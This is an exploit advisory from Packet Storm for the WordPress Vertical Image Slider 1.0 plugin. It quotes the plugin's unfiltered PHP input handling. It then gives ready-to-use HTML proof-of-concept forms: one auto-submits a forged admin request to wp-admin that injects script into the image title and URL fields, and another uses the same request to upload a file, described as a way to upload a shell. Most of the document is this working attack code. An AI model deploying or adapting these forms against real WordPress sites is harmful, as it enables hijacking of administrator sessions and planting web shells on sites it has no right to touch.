WordPress Vertical Image Slider 1.0 CSRF / XSS

2015-09-19T00:00:00
ID PACKETSTORM:133615
Type packetstorm
Reporter Ehsan Hosseini
Modified 2015-09-19T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Wordpress Vertical image slider CSRF/XSS  
# Exploit Author: Ashiyane Digital Security Team  
# Vendor Homepage: https://wordpress.org/plugins/wp-vertical-image-slider/  
# Software Link:   
https://downloads.wordpress.org/plugin/wp-vertical-image-slider.zip  
# Date: 2015-08-2  
# Version: 1.0  
# Tested On : Elementary OS - Firefox  
######################  
# Vulnerabilities :  
- Cross Site Request Forgery (For change the values and upload shell)  
- Cross Site Scripting  
######################  
# Vulnerable Code:  
<?php  
$title=trim(addslashes($_POST['imagetitle']));  
$imageurl=trim($_POST['imageurl']);  
?>  
...  
<input type="text" id="imageurl" class="url" tabindex="1" size="30"   
name="imageurl" value="<?php echo $image_link; ?>">  
<input type="text" id="imagetitle" tabindex="1" size="30"   
name="imagetitle" value="<?php echo $title;?>">  
# it shows the content of imagetitle and imageurl parameter without   
any filters.  
######################  
# Exploit (CSRF, XSS):  
-->  
  
<form method="post" name="form1"   
action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit"   
enctype="multipart/form-data">  
<input type="hidden" name="imagetitle"   
value='"><script>alert("XSS")</script>'>  
<input type="hidden" name="imageurl" value='"><script>alert("XSS")</script>'>  
<input type="file" name="image_name" />  
<input type="submit" name="btnsave" value="Save Changes">  
</form>  
<script type="text/javascript">  
setTimeout('form1.submit()', 1);  
</script>  
  
<!--  
######################  
# Just for upload something by CSRF:  
-->  
<form method="post"   
action="http://[URL]/[PATH]/wp-admin/admin.php?page=vertical_thumbnail_slider_image_management&action=addedit"   
enctype="multipart/form-data">  
<input type="file" name="image_name" />  
<input type="submit" name="btnsave" value="Save Changes">  
</form>  
  
  
<!--  
######################  
# Discovered By : Ehsan Hosseini  
######################  
-->  
`